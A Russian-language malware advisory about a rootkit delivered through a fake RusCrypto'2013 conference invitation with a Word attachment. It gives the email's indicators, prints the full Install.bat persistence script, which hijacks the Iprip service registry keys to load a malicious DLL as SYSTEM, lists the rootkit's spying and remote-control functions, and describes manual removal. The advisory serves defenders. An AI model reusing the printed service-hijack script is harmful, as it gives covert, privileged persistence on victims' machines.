Обнаружен новый руткит, распространяющийся через почтовые вложения

На этой неделе была зафиксирована массовая рассылка по электронной почте писем, содержащих вложение с вредоносным кодом. Письмо выглядит, как приглашение посетить очередную конференцию РусКрипто.

Письмо имеет следующие характеристики:

Заголовок: Приглашение на работе XIV международной конференции «РусКрипто’2013

Вложение: Приложние.doc

Адрес отправителя: info.ruscrypto@mail.ru

Вредоносный код содержится во вложении. Заражение происходит при открытии вложения, либо при предпросмотре вложения в почтовом клиенте.

Уязвимы системы на базе 32 разрядной Windows XP/Vista/7 с установленным MS Office последних версий, при условии, что исправление безопасности к MS Office не установлено. При открытии файла, в MS Word открывается документ (см. рисунок), что означает, что инфицирование произошло, однако  активируется руткит только после перезагрузки системы.

am_vir.jpg

Руткит в контексте MicrosoftWord, определялся (на 13 ноября 2012 г.)  только 13 из 44 антивирусов (по данным virustotal.com), предположительно, имеет множество модификаций. Далее следует описание одной из модификаций.

Руткит устанавливается через VB script, который выполняется в cmd.exe, далее в каталоге Windows\Resources\ создаются два файла:

Install.bat - 1604 байта

netware_01ex.dll - 50 688 байт

Файл Install.bat имеет следующее содержимое:

@echo onбббббббббббббббббббббб

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip"  /v  Description /t reg_sz /d "IP Address manager.Provides support for IP config. If this service is stopped, out-of-process requests will not be processed. If this service is disabled, any services that explicitly depend on it will fail to start." /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip"  /v  DisplayName /t reg_sz /d "IP Manger" /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip"  /v  ErrorControl /t reg_dword /d 1 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip"  /v  ImagePath /t reg_expand_sz /d "%%SystemRoot%%\System32\svchost.exe -k netsvcs" /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip"  /v  ObjectName /t reg_sz /d "LocalSystem" /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip"  /v  Start /t reg_dword /d 2 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip"  /v  Type /t reg_dword /d 16 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip\Enum"  /v  0 /t reg_sz /d "Root\LEGACY_NETWARE_01\0000" /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip\Enum"  /v  Count /t reg_dword /d 1 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip\Enum"  /v  NextInstance /t reg_dword /d 1 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip\Parameters"  /v  ServiceDll /t reg_expand_sz /d "%%SystemRoot%%\Resources\netware_01ex.dll" /f

pause бббббббббббб бббббббббббббб

 

В результате выполнения этого скрипта, netware_01ex.dll, устанавливается как служба и как драйвер, таким образом, получая после перезагрузки права SYSTEM в том числе и уровня ядра.
Функционал rootkita:
1. Открытие соединения на компьютер жертвы

2. Маскировка под IE, отправка накопленных данных POST запросом, на получаемые от хозяина  адреса.

3. Создание скриншотов экрана.

4. Получение списка пользователей в том числе и доменных.

5. Сбор трафика со всех имеющихся сетевых устройств.
6. Накопление собранных данных в MyTmpFile.Dat
7. Выполнение произвольных команд, полученных от хозяина.

8. Запуск файлов, полученных от хозяина.

9. Повышение привилегий процессов.

10. Сбор информации об оборудовании.

 

Руткит может быть удален вручную следующим образом:

Cmd.exe /c net stop iprip

Вычищаем ветку реестра HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Iprip

Удаляем два файла:

c:\windows\Resources\netware_01ex.dll

c:\windows\Resources\Install.bat

 

Либо с помощью утилиты удаления (пароль на архив "admon" без кавычек)